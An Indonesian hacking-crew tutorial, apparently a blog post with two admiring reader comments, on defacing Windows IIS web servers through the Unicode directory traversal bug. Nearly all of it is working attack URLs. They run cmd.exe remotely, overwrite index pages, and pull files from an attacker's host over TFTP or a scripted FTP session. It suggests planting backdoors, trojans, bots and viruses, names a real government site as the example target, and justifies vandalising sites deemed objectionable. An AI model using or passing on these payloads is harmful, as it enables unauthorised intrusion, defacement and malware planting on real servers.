Tutorial Unicode By Jati/Gab ( Crew SMPN19 Bogor)Os Target Windows Nt /9xIni HendakNya Dijadikan Bahan Percobaan yang Bermanfaat YachTutorial ini diperoleh dari orang orang yang aktif di irc.dal.net chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team,
#Makassarhack, #Indohack #IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking,
#Aritechdev,#Neoteker ...etcINGAT JIKA KAMU MERASA MENJADI HACKER SEJATI JANGAN MERUSAK WEB ORANG
TAPI HANYA MEMPERINGATKAN SAJA SUPAYA SEKURITYNYA LEBIH BAIK LAGI.JANGAN LUPA SELALU MEMBECKUP WEB YANG KAMU HACK JADI KAMU BISA
MEMBANTU MEMBENARKANYA LAGI.KAMU BOLEH MERUSAK WEB JIKA WEB TERSEBUT BERBAU SARA, RAS, DAN PORNO
SERTA YANG SIFATNYA MENDORONG ORANG UNTUK ANARKIS/MENGHASUT
KEKERASANBE WHITE HACKER DON’T BE BLACK HACKER/CRACKERPEACE AND FREE1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->>
www.polri.go.id
2. Login Ini Merupakan Directory yang Ada Di Web Site Tersebut Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut
Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini ada beberapa contoh login diantaranya : a)/_vti_bin b)/_vti_cnf c)/cgi-bin d)/scripts e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code
ini yang dapat membaca bug cgi nya hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng a) ..%c1%1c.. b) ..%c0%9v.. c) ..%c0%af.. d) ..%c0%qf.. e) ..%c1%8s.. f) ..%e0%80%af.. g) ..%c1%9c.. h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98 0xB5 ISO 8859-1 0xC5 ISO 8859-1 0xEA CP437 0x2140 JIS X 0208 0x22 ISO 8859-1
5. Cara KerjaSecara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau
http://www.polri.go.id/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
contohnya -->>
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah
menembus web site itu Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver
tersebut sama halnya command dir yang kita lakukan di Dos Prompt Directory of c: 10/05/2001 19:56
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan
menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
menjadi
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem
WebServer tersebut Keluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:wwwpolri
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau
nama anda contoh Jati.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jati.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:win
ntsystem32cmd.exe+c:jati.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c: Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.)Cari halaman index ke www.target.com/blah.ida Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path. Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpubwwwrootindex.ht
m
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau
dengan kata lain folder webnya
e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker
kerjanya bukan menghancurkan tapi memperingatkan hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja
merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan
cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+copy+c:inetpubwwwrootindex.
htm+c:inetpubwwwrootindex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack
ed+>+c:inetpubwwwrootindex.htm untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+You%20Were%20Hack
ed+>+c:inetpubwwwrootjati.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You
Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjati.htm file yang
ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren
Gunakan command ini /c+echo"
Thanks To Pepole On Irc.Dal.net
%23MinangCrew And %23Hackermuda
Thanks To Pepole On Irc.Dal.net
%23MinangCrew And %23Hackermuda
Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan
perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootindex.
htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+type+c:inetpubwwwrootjati.ht
m Atau liat Langsung aja http://www.polri.go.id/ atau www.polri.go.id/jati.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan )
Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32 Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik
keyword nya TFTP32 Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung
sajah. mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya
atau bugcginya sehinggha kita mendapatkan holenya atau script nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/ langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File
htm/html halaman web defacenya ( berkreasi lah dikau disini ) Setelah semua siap baru upload dengan command
http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer
TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web
site) tidak mau menerima up-load file kita tadee .Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.
C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu
kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi
bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.)Setelaha kita menemukan vulnernya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c: Directory of c: 10/05/2001 19:56
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memedekan
command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+jati+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+get+jati.htm+>>+c:inetpubwwwrootjati.ftp - http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjati.ftp
Setelah Scrip jati.ftp selesai di liat lagi script nya apa benar http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjati.ftp
Setelah selesai script tuh kita jalan kan lagi script nya: http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjati.ftp
buka ie satulagi untuk liat file nya dah smapai belum http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot Kalau dah terkirim selamat dah
Keterangan nya :Pada scrip jati.ftp itu kita muatkan hal ini sebenarnyaopen geocities.com --->>> scriptnya --->>
+echo+open+geocities.com+>>+c:inetpubwwwrootjati.ftpjati --->> user name --->>> scriptnya -->> +echo+jati+>>+c:inetpubwwwrootjati.ftpanuamakang --->>> password --->>> scriptnya -->>
+echo+anuamakang+>>+c:inetpubwwwrootjati.ftplcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya
-->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjati.ftpascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjati.ftpget jati.htm ---->>> command tranfer file --->>> +echo+get+jati.htm+>>+c:inetpubwwwrootjati.ftpclose --->> perintah dc ke web server ---->>> scripnya --->>>
+echo+close+>>+c:inetpubwwwrootjati.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror,
ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
Catatan : - Daftar Pustaka .) Tutorial R3VOLT Anggota #Medanhacking .) Tutorial Pak_Tani Anggota #Cracxer .) Tutoriaal Dis0RdeR Anggota #Medanhacking .) Tutorial Rio_Martin Anggota #IndoSnifing
- Revisi Dan Tambahan Serta edit Dari Jati - Kalau Mau Download Software IIS Scaner Di Web Site . WWW.ElHACKER.NET . WWW.KEBAM.NET - Jangan Jadi Cracker Yang merusak kerja nya
Okde........... Wasalam....... See You In Next Tutorial ( Script Kidies ) ........................:::::::VIVA #MINANGCREW And #HACKERMUDA:::::::::............. Link Web• Aikmel Community • Antihackerlink • Echo • Forum Diskusi Linux • HarryChanPutra • HarryChanPutra • I S I C • id-ubuntu • Indo BSD • Jasakom • Konsultan Linux • w[X]f project • XNUXER ________________________________________
itu caranya??
BalasHapushebat lo brow.. can i learn more?/
BalasHapus